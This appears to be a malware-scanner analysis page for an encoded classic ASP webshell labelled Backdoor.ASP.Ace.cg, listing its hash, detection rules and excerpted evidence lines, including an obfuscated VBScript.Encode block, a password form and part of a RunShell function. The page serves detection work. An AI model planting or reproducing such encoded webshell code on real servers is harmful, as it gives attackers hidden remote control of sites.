Hostile 92% Download

Backdoor.ASP.Ace.cg

Encoded ASP webshell backdoor

Webshell in VBscript or JScript encoded using *.Encode plus a suspicious stringClassic ASP VBScript.Encode language directive
SHA-25601ca3ce707d6d3d0b838a42591ebf08bbd188f735a14a6d8c3f7319fdca619e3
MaleculeO(C)Th

Evidence

Classic ASP VBScript.Encode language directive lines 1–10
1<%@ LANGUAGE = VBScript.Encode %>
2<%#@~^mQAAAA==@#@&WU,+MDWMPMn/!:nP +aO@#@&k6~`"+;!ndYcsKDh`EKm/dhK.Nr#@!@*rJ#~O4+UPknk/rKxvJwm/kE#{In;!+dOcsWMh`rnlkdAWMNr#@#@&rW,`d+kdkKxcEal/dE*@!@*JXa9W^r#,Ktx@#@&1i0AAA==^#~@%>
3<form id="Auth" name="Auth" action="<%=#@~^IAAAAA==~"+5!+kYRU+M-+M.CDbl8s/`riIdJ#,7woAAA==^#~@%>" method="POST">
4 <input type="hidden" name="Password">
5</form>
⋯5 lines
Webshell in VBscript or JScript encoded using *.Encode plus a suspicious string lines 65–83
⋯4 lines
69}
70
71function RunShell(sPath,sName)
72{
73 CCNB.ActionName.value=sName;
⋯10 lines

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.